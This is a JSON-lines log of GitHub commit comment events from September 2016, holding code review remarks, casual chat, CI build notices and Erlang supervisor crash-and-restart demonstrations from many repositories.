{"id":"4541117594","type":"CommitCommentEvent","actor":{"login":"fernando-juan"},"repo":{"name":"fernando-juan/laroca"},"payload":{"comment":{"id":18965811,"position":null,"line":null,"path":null,"commit_id":"4c9228bcb4b3c8abd4d4cf6c6b79b5de2577eb52","created_at":"2016-09-09T16:42:48Z","updated_at":"2016-09-09T16:42:48Z","body":"No me gusta"}},"created_at":"2016-09-09T16:42:48Z"}
{"id":"4541123075","type":"CommitCommentEvent","actor":{"login":"JoseVf"},"repo":{"name":"fernando-juan/laroca"},"payload":{"comment":{"id":18965823,"position":null,"line":null,"path":null,"commit_id":"4c9228bcb4b3c8abd4d4cf6c6b79b5de2577eb52","created_at":"2016-09-09T16:43:55Z","updated_at":"2016-09-09T16:43:55Z","body":"Ami si\r\n"}},"created_at":"2016-09-09T16:43:55Z"}
{"id":"4541123655","type":"CommitCommentEvent","actor":{"login":"umarfaruq"},"repo":{"name":"stv0g/c11-queues"},"payload":{"comment":{"id":18965825,"position":null,"line":null,"path":null,"commit_id":"8b9a5680bd48c396533d83d4cd4310d5db4a411b","created_at":"2016-09-09T16:44:04Z","updated_at":"2016-09-09T16:44:04Z","body":"I realized that I used \"git commit -am\" flag which committed some extra changes."}},"created_at":"2016-09-09T16:44:04Z"}
{"id":"4541123687","type":"CommitCommentEvent","actor":{"login":"fernando-juan"},"repo":{"name":"fernando-juan/laroca"},"payload":{"comment":{"id":18965826,"position":null,"line":null,"path":null,"commit_id":"4c9228bcb4b3c8abd4d4cf6c6b79b5de2577eb52","created_at":"2016-09-09T16:44:04Z","updated_at":"2016-09-09T16:44:04Z","body":"avici\r\n"}},"created_at":"2016-09-09T16:44:04Z"}
{"id":"4541124623","type":"CommitCommentEvent","actor":{"login":"JoseVf"},"repo":{"name":"fernando-juan/laroca"},"payload":{"comment":{"id":18965828,"position":null,"line":null,"path":null,"commit_id":"4c9228bcb4b3c8abd4d4cf6c6b79b5de2577eb52","created_at":"2016-09-09T16:44:17Z","updated_at":"2016-09-09T16:44:17Z","body":"DaVinci"}},"created_at":"2016-09-09T16:44:17Z"}
{"id":"4541126612","type":"CommitCommentEvent","actor":{"login":"fernando-juan"},"repo":{"name":"fernando-juan/laroca"},"payload":{"comment":{"id":18965833,"position":null,"line":null,"path":null,"commit_id":"9db3851fc2bed999171cc4f0ff522a2902202086","created_at":"2016-09-09T16:44:43Z","updated_at":"2016-09-09T16:44:43Z","body":"Nada\r\n+"}},"created_at":"2016-09-09T16:44:43Z"}
{"id":"4541126960","type":"CommitCommentEvent","actor":{"login":"EricSmekens"},"repo":{"name":"soney/jsep"},"payload":{"comment":{"id":18965834,"position":5,"line":355,"path":"src/jsep.js","commit_id":"fb5b01f01bc453c703d8fbb7d2fb7e46948edde6","created_at":"2016-09-09T16:44:48Z","updated_at":"2016-09-09T16:44:48Z","body":"Will check this soon with some use-cases with esprima.\r\nMaybe @soney could also have a little look into this thing if he has time."}},"created_at":"2016-09-09T16:44:48Z"}
{"id":"4541129660","type":"CommitCommentEvent","actor":{"login":"brush1990"},"repo":{"name":"brush1990/TestSys"},"payload":{"comment":{"id":18965843,"position":null,"line":null,"path":null,"commit_id":"8241604cccb4d7580269b0ad5d34fb47212abaea","created_at":"2016-09-09T16:45:22Z","updated_at":"2016-09-09T16:45:22Z","body":"modifiy by brush1990"}},"created_at":"2016-09-09T16:45:22Z"}
{"id":"4541135509","type":"CommitCommentEvent","actor":{"login":"tysonclugg"},"repo":{"name":"yjmade/django-ddp"},"payload":{"comment":{"id":18965860,"position":24,"line":0,"path":"dddp/models.py","commit_id":"f2738940e2759a83008bfb1b0e3f2a14358c9bd6","created_at":"2016-09-09T16:46:38Z","updated_at":"2016-09-09T16:46:38Z","body":"This is a beautiful change."}},"created_at":"2016-09-09T16:46:38Z"}
{"id":"4541139748","type":"CommitCommentEvent","actor":{"login":"MartijnKaijser"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18965875,"position":201,"line":959,"path":"xbmc/cores/AudioEngine/Sinks/AESinkWASAPI.cpp","commit_id":"ba4830514e335a21fd79567e670b70707b9ef683","created_at":"2016-09-09T16:47:32Z","updated_at":"2016-09-09T16:47:32Z","body":"EAC3 is quite rare else i would have mentioned it earlier. Only have one or two samples "}},"created_at":"2016-09-09T16:47:32Z"}
{"id":"4541141147","type":"CommitCommentEvent","actor":{"login":"fernando-juan"},"repo":{"name":"fernando-juan/laroca"},"payload":{"comment":{"id":18965884,"position":null,"line":null,"path":null,"commit_id":"a5636d3cd567322efb1182880fcba68664092829","created_at":"2016-09-09T16:47:49Z","updated_at":"2016-09-09T16:47:49Z","body":"El comienzo de los tiempos"}},"created_at":"2016-09-09T16:47:49Z"}
{"id":"4541142135","type":"CommitCommentEvent","actor":{"login":"zhongwencool"},"repo":{"name":"zhongwencool/erlang-rock"},"payload":{"comment":{"id":18965888,"position":null,"line":null,"path":null,"commit_id":"c76a586ba445b99d568e1360fd102a9b416db56e","created_at":"2016-09-09T16:48:01Z","updated_at":"2016-09-09T16:48:01Z","body":"1. make sure only one child process(fish_keeper) for better debug ;\r\n2. rebar3 shell\r\n\r\n```\r\n===> Booted zoo\r\n1> {0,42,1} [fish_keeper   ] is working\r\n{0,42,4} [fish_keeper   ] is working\r\n{0,42,7} [fish_keeper   ] is working\r\n{0,42,10} [fish_keeper   ] is working\r\n```\r\n3. \r\n```erlang\r\n1> erlang:send(fish_keeper, off_duty).\r\n=ERROR REPORT==== 10-Sep-2016::00:44:07 ===\r\n** Generic server fish_keeper terminating\r\n** Last message in was off_duty\r\n** When Server state == fish_keeper\r\n** Reason for termination ==\r\n** {off_duty,[{zoo_keeper,handle_info,2,\r\n                          [{file,\"/Users/zhongwen/github/erlang-rock/restart-strategy/zoo/_build/default/lib/zoo/src/zoo_keeper.erl\"},\r\n                           {line,31}]},\r\n              {gen_server,try_dispatch,4,[{file,\"gen_server.erl\"},{line,615}]},\r\n              {gen_server,handle_msg,5,[{file,\"gen_server.erl\"},{line,681}]},\r\n              {proc_lib,init_p_do_apply,3,\r\n                        [{file,\"proc_lib.erl\"},{line,240}]}]}\r\n2> {0,44,7} [fish_keeper   ] is starting\r\n\r\n=CRASH REPORT==== 10-Sep-2016::00:44:07 ===\r\n  crasher:\r\n    initial call: zoo_keeper:init/1\r\n    pid: <0.72.0>\r\n    registered_name: fish_keeper\r\n    exception exit: off_duty\r\n      in function  gen_server:terminate/7 (gen_server.erl, line 826)\r\n    ancestors: [zoo_sup,<0.70.0>]\r\n    messages: []\r\n    links: [<0.71.0>]\r\n    dictionary: []\r\n    trap_exit: true\r\n    status: running\r\n    heap_size: 987\r\n    stack_size: 27\r\n    reductions: 1083\r\n  neighbours:\r\n\r\n=SUPERVISOR REPORT==== 10-Sep-2016::00:44:07 ===\r\n     Supervisor: {local,zoo_sup}\r\n     Context:    child_terminated\r\n     Reason:     off_duty\r\n     Offender:   [{pid,<0.72.0>},\r\n                  {id,fish_keeper},\r\n                  {mfargs,{zoo_keeper,start_link,[fish_keeper]}},\r\n                  {restart_type,permanent},\r\n                  {shutdown,1000},\r\n                  {child_type,worker}]\r\n\r\n\r\n=PROGRESS REPORT==== 10-Sep-2016::00:44:07 ===\r\n          supervisor: {local,zoo_sup}\r\n             started: [{pid,<0.85.0>},\r\n                       {id,fish_keeper},\r\n                       {mfargs,{zoo_keeper,start_link,[fish_keeper]}},\r\n                       {restart_type,permanent},\r\n                       {shutdown,1000},\r\n                       {child_type,worker}]\r\n{0,44,8} [fish_keeper   ] is working\r\n```\r\n4. Repeatly sending  `erlang:send(fish_keeper, off_duty).`,  fish_keeper will alway restart after crash."}},"created_at":"2016-09-09T16:48:01Z"}
{"id":"4541142603","type":"CommitCommentEvent","actor":{"login":"JoseVf"},"repo":{"name":"fernando-juan/laroca"},"payload":{"comment":{"id":18965889,"position":null,"line":null,"path":null,"commit_id":"a5636d3cd567322efb1182880fcba68664092829","created_at":"2016-09-09T16:48:09Z","updated_at":"2016-09-09T16:48:09Z","body":"Cuando lo que reinaba era la nada\r\n"}},"created_at":"2016-09-09T16:48:09Z"}
{"id":"4541146026","type":"CommitCommentEvent","actor":{"login":"beck"},"repo":{"name":"yola/classlist-polyfill"},"payload":{"comment":{"id":18965899,"position":null,"line":null,"path":null,"commit_id":"41a8847fcf084fa1237fe85e87594bd522bee08f","created_at":"2016-09-09T16:48:49Z","updated_at":"2016-09-09T16:48:49Z","body":"I just merged someone's else work so I could tackle an issue without having to write all the tests myself.\r\n\r\nWhat ever happened with this? Why delete?"}},"created_at":"2016-09-09T16:48:49Z"}
{"id":"4541146785","type":"CommitCommentEvent","actor":{"login":"tabatkins"},"repo":{"name":"tabatkins/bikeshed"},"payload":{"comment":{"id":18965903,"position":null,"line":null,"path":null,"commit_id":"befeb4baa86128ea51fc2c7c729b01c2c6ad60c4","created_at":"2016-09-09T16:48:59Z","updated_at":"2016-09-09T16:48:59Z","body":"> What are algorithms supposed to look like in Bikeshed's opinion?\r\n\r\nYou're doing just fine.  Marking sections as containing algorithms is A+ Bikeshed-blessed behavior.  But you can *also* mark arbitrary containers as containing algorithms, and they benefit from having a little more visual separation between them when you have several one after the other, like @jyasskin had in one of their specs.\r\n\r\nIf you're separating algorithms into separate sections, you already have the visual breathing-room and separation that this commit adds, so don't worry about it. ^_^"}},"created_at":"2016-09-09T16:48:59Z"}
{"id":"4541147826","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18965905,"position":null,"line":null,"path":null,"commit_id":"e62d81544e039f42d2aa972c24d784702348565b","created_at":"2016-09-09T16:49:11Z","updated_at":"2016-09-09T16:49:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 981](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13104&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-09T16:49:11Z"}
{"id":"4541148681","type":"CommitCommentEvent","actor":{"login":"asolove"},"repo":{"name":"websdotcom/freewebs-jira-announcement"},"payload":{"comment":{"id":18965908,"position":null,"line":null,"path":null,"commit_id":"315c68ec656ef000b0d1ebf6725aa3fb791a74ca","created_at":"2016-09-09T16:49:18Z","updated_at":"2016-09-09T16:49:18Z","body":":fork:"}},"created_at":"2016-09-09T16:49:18Z"}
{"id":"4541151886","type":"CommitCommentEvent","actor":{"login":"CassianoViana"},"repo":{"name":"CassianoViana/PayFood"},"payload":{"comment":{"id":18965916,"position":null,"line":null,"path":null,"commit_id":"218b73bf7cbd748dc6f43c45e74d672171ad1bdd","created_at":"2016-09-09T16:49:56Z","updated_at":"2016-09-09T16:49:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;lRctCgC4&#x2F;9-listagem-estabelecimentos\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Listagem estabelecimentos</a>"}},"created_at":"2016-09-09T16:49:56Z"}
{"id":"4541155844","type":"CommitCommentEvent","actor":{"login":"Ankitanj"},"repo":{"name":"Ankitanj/Ankitanj.github.io"},"payload":{"comment":{"id":18965924,"position":null,"line":null,"path":null,"commit_id":"875d9eceab2f50f381bac491a7eb31989071914d","created_at":"2016-09-09T16:50:43Z","updated_at":"2016-09-09T16:50:43Z","body":"edit"}},"created_at":"2016-09-09T16:50:43Z"}
{"id":"4541157607","type":"CommitCommentEvent","actor":{"login":"ghitchens"},"repo":{"name":"NationalAssociationOfRealtors/mdns"},"payload":{"comment":{"id":18965929,"position":null,"line":null,"path":null,"commit_id":"b69e0afedffd48b4cb3b05a4a3ed920ebac749dc","created_at":"2016-09-09T16:51:06Z","updated_at":"2016-09-09T16:51:06Z","body":"Excellent!  looking forward to trying this."}},"created_at":"2016-09-09T16:51:06Z"}
{"id":"4541158846","type":"CommitCommentEvent","actor":{"login":"TheLarkInn"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":18965937,"position":null,"line":null,"path":null,"commit_id":"dd668f5140b11d49d75d7975fa1c7901d0c41c44","created_at":"2016-09-09T16:51:20Z","updated_at":"2016-09-09T16:51:20Z","body":"Now that we are using markdownlint, I have a feeling we can create a rule to disallow a certain type if needed. "}},"created_at":"2016-09-09T16:51:20Z"}
{"id":"4541161325","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"jonschlinkert/github-base"},"payload":{"comment":{"id":18965945,"position":null,"line":null,"path":null,"commit_id":"99ab167f972de2a93dcecd9b0af5ff1b5c75d56a","created_at":"2016-09-09T16:51:52Z","updated_at":"2016-09-09T16:51:52Z","body":"LGTM, great! Good idea to separate the tests.\r\n\r\n> I initially tried merging in `request-all` but wasn't able to get it to work on more than one or two tests.\r\n\r\nWhich ones? Can't remember if it works with latest `simple-get`."}},"created_at":"2016-09-09T16:51:52Z"}
{"id":"4541162670","type":"CommitCommentEvent","actor":{"login":"DianeOfTheMoon"},"repo":{"name":"DianeOfTheMoon/Roth_UI"},"payload":{"comment":{"id":18965952,"position":null,"line":null,"path":null,"commit_id":"51452f605303551296402ce1602fd4c85440d673","created_at":"2016-09-09T16:52:10Z","updated_at":"2016-09-09T16:52:10Z","body":"One of the things I've been trying to find out is where all of the fonts get used, to see if I could split things into headers and text.  From there, I had planned on moving target frame and targettarget settings in.  I haven't been able to find out how to hook onto clicking okay...maybe the ProfileSaved event?\r\n\r\nAlso, AceConfig allows for saving settings on a character, class, realm, profile or global settings, so we'll want to figure out the right level to save various settings.\r\n\r\nFinally, in order to use the config, we have to actually configure them post ADDON_LOADED since that's when the saved variables would be available."}},"created_at":"2016-09-09T16:52:10Z"}
{"id":"4541162765","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18965953,"position":null,"line":null,"path":null,"commit_id":"7a6c674a0614e579957aff625c76bf2c17eb4e9b","created_at":"2016-09-09T16:52:12Z","updated_at":"2016-09-09T16:52:12Z","body":"`DisintT` and `disint` are very much works-in-progress.  (I don't know what's confusing about the disintegration code though?).  Do take out the `value` call - that will cause a test to fail, which will narrow down the issue of where that `Int` comes from.  We can then discuss the timelines for figuring it out."}},"created_at":"2016-09-09T16:52:12Z"}
{"id":"4541165348","type":"CommitCommentEvent","actor":{"login":"AbhiAgarwal"},"repo":{"name":"TechAtNYU/tech-nyu-site"},"payload":{"comment":{"id":18965961,"position":null,"line":null,"path":null,"commit_id":"77c5dedaa4e38689c462e7a1b013ff68a4db4499","created_at":"2016-09-09T16:52:43Z","updated_at":"2016-09-09T16:52:43Z","body":"woo!"}},"created_at":"2016-09-09T16:52:43Z"}
{"id":"4541170352","type":"CommitCommentEvent","actor":{"login":"jonschlinkert"},"repo":{"name":"jonschlinkert/github-base"},"payload":{"comment":{"id":18965974,"position":null,"line":null,"path":null,"commit_id":"99ab167f972de2a93dcecd9b0af5ff1b5c75d56a","created_at":"2016-09-09T16:53:47Z","updated_at":"2016-09-09T16:53:47Z","body":"I was going to create an issue over on request-all. It might be simple-get issues. "}},"created_at":"2016-09-09T16:53:47Z"}
{"id":"4541170847","type":"CommitCommentEvent","actor":{"login":"jonschlinkert"},"repo":{"name":"jonschlinkert/github-base"},"payload":{"comment":{"id":18965975,"position":null,"line":null,"path":null,"commit_id":"99ab167f972de2a93dcecd9b0af5ff1b5c75d56a","created_at":"2016-09-09T16:53:54Z","updated_at":"2016-09-09T16:53:54Z","body":"> LGTM, great! Good idea to separate the tests.\r\n\r\nthanks!"}},"created_at":"2016-09-09T16:53:54Z"}
{"id":"4541170906","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"CyanogenMod/android_packages_apps_Settings"},"payload":{"comment":{"id":18965976,"position":null,"line":null,"path":null,"commit_id":"d41b8049f2fe076bb4e0726ea90e6d644208cd47","created_at":"2016-09-09T16:53:55Z","updated_at":"2016-09-09T16:53:55Z","body":"@Caio99BR Nice. Thanks a ton."}},"created_at":"2016-09-09T16:53:55Z"}
{"id":"4541172436","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18965979,"position":null,"line":null,"path":null,"commit_id":"4d35b4442e6218f2937e9feb938ec92a7dec1e3b","created_at":"2016-09-09T16:54:13Z","updated_at":"2016-09-09T16:54:13Z","body":"@Nadahar Any help welcome, as usual ;-)\r\nI think that any modest work is better than nothing...and will appreciate any improvements.\r\nThese settings, like `audio_resample` should be in the renderer configuration.\r\n\r\nThat's said, except for very rare cases where the renderer send many requests fulling the buffer out of limit, certainly like Vizio, i will not encourage users to modify it !"}},"created_at":"2016-09-09T16:54:13Z"}
{"id":"4541173752","type":"CommitCommentEvent","actor":{"login":"MarkHerhold"},"repo":{"name":"Starcounter-Jack/JSON-Patch"},"payload":{"comment":{"id":18965981,"position":null,"line":null,"path":null,"commit_id":"924069918a7033849c1e61e793488b506f1849c1","created_at":"2016-09-09T16:54:31Z","updated_at":"2016-09-09T16:54:31Z","body":"Why was this brought back? Did I miss the issue where this was discussed?"}},"created_at":"2016-09-09T16:54:31Z"}
{"id":"4541174846","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"jonschlinkert/github-base"},"payload":{"comment":{"id":18965983,"position":null,"line":null,"path":null,"commit_id":"99ab167f972de2a93dcecd9b0af5ff1b5c75d56a","created_at":"2016-09-09T16:54:46Z","updated_at":"2016-09-09T16:54:46Z","body":"Okey. Btw, missing `.use` docs comment"}},"created_at":"2016-09-09T16:54:46Z"}
{"id":"4541176957","type":"CommitCommentEvent","actor":{"login":"jcredding"},"repo":{"name":"redding/mr"},"payload":{"comment":{"id":18965988,"position":null,"line":null,"path":null,"commit_id":"8bed36c7b8a491a1288851e99da6fc46742f780e","created_at":"2016-09-09T16:55:13Z","updated_at":"2016-09-09T16:55:13Z","body":"/cc @kellyredding "}},"created_at":"2016-09-09T16:55:13Z"}
{"id":"4541180238","type":"CommitCommentEvent","actor":{"login":"austinmeier"},"repo":{"name":"austinmeier/ontology-of-plant-stress"},"payload":{"comment":{"id":18966001,"position":null,"line":null,"path":null,"commit_id":"89bc645ecaea5d38c84a4a907a178e49a8036803","created_at":"2016-09-09T16:55:52Z","updated_at":"2016-09-09T16:55:52Z","body":"Okay, I didn't think so, but I was just trying to fix the travis check.  Because those imports are really the only things I changed, I thought that might have been the problem.  I'll take them out today.\r\nAppreciate the guidance on this stuff."}},"created_at":"2016-09-09T16:55:52Z"}
{"id":"4541181156","type":"CommitCommentEvent","actor":{"login":"RolandasRazma"},"repo":{"name":"Alamofire/Alamofire"},"payload":{"comment":{"id":18966003,"position":4,"line":3,"path":"Alamofire.podspec","commit_id":"9563afbdca6fe55d87d081a83ac04479c4e76a99","created_at":"2016-09-09T16:56:02Z","updated_at":"2016-09-09T16:56:02Z","body":"there is no tag or branch for 4.0.0 - pods fail..."}},"created_at":"2016-09-09T16:56:02Z"}
{"id":"4541181767","type":"CommitCommentEvent","actor":{"login":"silbermm"},"repo":{"name":"crdschurch/SS-CMS"},"payload":{"comment":{"id":18966005,"position":null,"line":null,"path":null,"commit_id":"c203677e2c6533513a059289da3db177be002749","created_at":"2016-09-09T16:56:15Z","updated_at":"2016-09-09T16:56:15Z","body":"TeamCity Code :: 1. Development :: CMS :: Features [Build 42](http://mp-ci.centralus.cloudapp.azure.com/viewLog.html?buildId=8369&buildTypeId=Code_Development_Cms_Features&guest=1) is now running\n"}},"created_at":"2016-09-09T16:56:15Z"}
{"id":"4541184215","type":"CommitCommentEvent","actor":{"login":"silbermm"},"repo":{"name":"crdschurch/SS-CMS"},"payload":{"comment":{"id":18966010,"position":null,"line":null,"path":null,"commit_id":"c203677e2c6533513a059289da3db177be002749","created_at":"2016-09-09T16:56:42Z","updated_at":"2016-09-09T16:56:42Z","body":"TeamCity Code :: 1. Development :: CMS :: Features [Build 42](http://mp-ci.centralus.cloudapp.azure.com/viewLog.html?buildId=8369&buildTypeId=Code_Development_Cms_Features&guest=1) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:26"}},"created_at":"2016-09-09T16:56:42Z"}
{"id":"4541185593","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18966016,"position":null,"line":null,"path":null,"commit_id":"2a89e77391bb9c027c32de0480815ee15dcd1587","created_at":"2016-09-09T16:57:00Z","updated_at":"2016-09-09T16:57:00Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#V6Swc10lROyLFuE9RHglkg"}},"created_at":"2016-09-09T16:57:00Z"}
{"id":"4541185668","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18966017,"position":null,"line":null,"path":null,"commit_id":"e62d81544e039f42d2aa972c24d784702348565b","created_at":"2016-09-09T16:57:01Z","updated_at":"2016-09-09T16:57:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 981](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13104&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 223, ignored: 3 Build time: 00:07:50\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-09T16:57:01Z"}
{"id":"4541185911","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18966019,"position":null,"line":null,"path":null,"commit_id":"2a89e77391bb9c027c32de0480815ee15dcd1587","created_at":"2016-09-09T16:57:05Z","updated_at":"2016-09-09T16:57:05Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#NkivEQdfQ0aH2blgGbaP4Q"}},"created_at":"2016-09-09T16:57:05Z"}
{"id":"4541186417","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18966021,"position":null,"line":null,"path":null,"commit_id":"2a89e77391bb9c027c32de0480815ee15dcd1587","created_at":"2016-09-09T16:57:13Z","updated_at":"2016-09-09T16:57:13Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Ce_K1t50REyqQ8N4ylmkiQ"}},"created_at":"2016-09-09T16:57:13Z"}
{"id":"4541197481","type":"CommitCommentEvent","actor":{"login":"enk1"},"repo":{"name":"enk1/grywalizacja"},"payload":{"comment":{"id":18966046,"position":null,"line":null,"path":null,"commit_id":"fdec9c3a9cc6ea7370a9910aa9ea419a4dbd4ae9","created_at":"2016-09-09T16:59:30Z","updated_at":"2016-09-09T16:59:30Z","body":"Nie robiłem customowego RWD, bo nie było do tego layou, dodałem tylko odpowiedni grid."}},"created_at":"2016-09-09T16:59:30Z"}
{"id":"4541199448","type":"CommitCommentEvent","actor":{"login":"zhongwencool"},"repo":{"name":"zhongwencool/erlang-rock"},"payload":{"comment":{"id":18966053,"position":null,"line":null,"path":null,"commit_id":"c63d182a3bbb2ba1f61a94b0711d55456356b6a3","created_at":"2016-09-09T16:59:55Z","updated_at":"2016-09-09T16:59:55Z","body":"- rebar3 shell\r\n```erlang\r\n===> Booted zoo\r\n{0,54,11} [fish_keeper   ] is working\r\n1> {0,54,14} [fish_keeper   ] is working\r\n```\r\n\r\n- make fish_keeper crash by `erlang:exit/1`\r\n```erlang\r\nerlang:send(fish_keeper, off_duty).\r\n{0,54,18} [   fish_keeper] terminate by off_duty\r\noff_duty\r\n\r\n=ERROR REPORT==== 10-Sep-2016::00:54:18 ===\r\n** Generic server fish_keeper terminating\r\n** Last message in was off_duty\r\n** When Server state == fish_keeper\r\n** Reason for termination ==\r\n** {off_duty,[{zoo_keeper,handle_info,2,\r\n                          [{file,\"/Users/zhongwen/github/erlang-rock/restart-strategy/zoo/_build/default/lib/zoo/src/zoo_keeper.erl\"},\r\n                           {line,31}]},\r\n              {gen_server,try_dispatch,4,[{file,\"gen_server.erl\"},{line,615}]},\r\n              {gen_server,handle_msg,5,[{file,\"gen_server.erl\"},{line,681}]},\r\n              {proc_lib,init_p_do_apply,3,\r\n                        [{file,\"proc_lib.erl\"},{line,240}]}]}\r\n2>\r\n=CRASH REPORT==== 10-Sep-2016::00:54:18 ===\r\n  crasher:\r\n    initial call: zoo_keeper:init/1\r\n    pid: <0.77.0>\r\n    registered_name: fish_keeper\r\n    exception exit: off_duty\r\n      in function  gen_server:terminate/7 (gen_server.erl, line 826)\r\n    ancestors: [zoo_sup,<0.75.0>]\r\n    messages: []\r\n    links: [<0.76.0>]\r\n    dictionary: []\r\n    trap_exit: true\r\n    status: running\r\n    heap_size: 987\r\n    stack_size: 27\r\n    reductions: 261\r\n  neighbours:\r\n\r\n=SUPERVISOR REPORT==== 10-Sep-2016::00:54:18 ===\r\n     Supervisor: {local,zoo_sup}\r\n     Context:    child_terminated\r\n     Reason:     off_duty\r\n     Offender:   [{pid,<0.77.0>},\r\n                  {id,fish_keeper},\r\n                  {mfargs,{zoo_keeper,start_link,[fish_keeper]}},\r\n                  {restart_type,temporary},\r\n                  {shutdown,1000},\r\n                  {child_type,worker}]\r\n2> whereis(fish_keeper).\r\nundefined\r\n```"}},"created_at":"2016-09-09T16:59:55Z"}
{"id":"4541200644","type":"CommitCommentEvent","actor":{"login":"lewisgoddard"},"repo":{"name":"elementary/website"},"payload":{"comment":{"id":18966060,"position":null,"line":null,"path":null,"commit_id":"2e68b8f7309cdfa81c491964126d6f6e94fbd9d3","created_at":"2016-09-09T17:00:11Z","updated_at":"2016-09-09T17:00:11Z","body":"This is the most frightening commit I have ever seen."}},"created_at":"2016-09-09T17:00:11Z"}
{"id":"4541204290","type":"CommitCommentEvent","actor":{"login":"manasgrg"},"repo":{"name":"manasgrg/portfolio"},"payload":{"comment":{"id":18966066,"position":null,"line":null,"path":null,"commit_id":"a5885269326e354e374ec8861ff3c26e95954f41","created_at":"2016-09-09T17:00:52Z","updated_at":"2016-09-09T17:00:52Z","body":"New Image with stroke"}},"created_at":"2016-09-09T17:00:52Z"}
{"id":"4541204783","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"nitro-cancro/android_hardware_qcom_display"},"payload":{"comment":{"id":18966068,"position":null,"line":null,"path":null,"commit_id":"db930424be8f135986f6f919dd2f3f7867f21896","created_at":"2016-09-09T17:00:58Z","updated_at":"2016-09-09T17:00:58Z","body":"this?\r\n"}},"created_at":"2016-09-09T17:00:58Z"}
{"id":"4541205045","type":"CommitCommentEvent","actor":{"login":"asdofindia"},"repo":{"name":"PeARSearch/PeARS"},"payload":{"comment":{"id":18966069,"position":15,"line":10,"path":"requirements.txt","commit_id":"b9872447b4b67c1568ee743b388e80bdbf548dae","created_at":"2016-09-09T17:01:02Z","updated_at":"2016-09-09T17:01:02Z","body":"What is this module? It's throwing the following error  \r\n\r\n    Could not find a version that satisfies the requirement pkg-resources==0.0.0 (from -r requirements.txt (line 10)) (from versions: )\r\n    No matching distribution found for pkg-resources==0.0.0 (from -r requirements.txt (line 10))\r\non `pip install`"}},"created_at":"2016-09-09T17:01:02Z"}
{"id":"4541207835","type":"CommitCommentEvent","actor":{"login":"koola"},"repo":{"name":"wswebcreation/pix-diff"},"payload":{"comment":{"id":18966075,"position":22,"line":49,"path":"index.js","commit_id":"661f9663b4680ddbd16ed6234c6211a919810044","created_at":"2016-09-09T17:01:35Z","updated_at":"2016-09-09T17:01:35Z","body":"We should probably use assert here and on other options\r\n```\r\nthis.autoResize = options.autoResize || true;\r\nassert.ok(typeof options.autoResize === 'boolean', 'Option autoResize accepts boolean values only.');\r\n```"}},"created_at":"2016-09-09T17:01:35Z"}
{"id":"4541208331","type":"CommitCommentEvent","actor":{"login":"mizapf"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18966076,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T17:01:41Z","updated_at":"2016-09-09T17:01:41Z","body":"OK, treating localized versions as clones has some point. Got to check the cartridge list."}},"created_at":"2016-09-09T17:01:41Z"}
{"id":"4541214220","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18966093,"position":null,"line":null,"path":null,"commit_id":"3bb36b43b5544680d1192eaebc44f472e703d030","created_at":"2016-09-09T17:02:49Z","updated_at":"2016-09-09T17:02:49Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GIC7OUS_QiKOBJF_m2Qm4Q"}},"created_at":"2016-09-09T17:02:49Z"}
{"id":"4541220387","type":"CommitCommentEvent","actor":{"login":"juanc18"},"repo":{"name":"juanc18/Repaso"},"payload":{"comment":{"id":18966109,"position":2,"line":2,"path":"README.md","commit_id":"32654e378da9dc93e75aac20177c1aba73ef5b21","created_at":"2016-09-09T17:04:06Z","updated_at":"2016-09-09T17:04:06Z","body":" - POO"}},"created_at":"2016-09-09T17:04:06Z"}
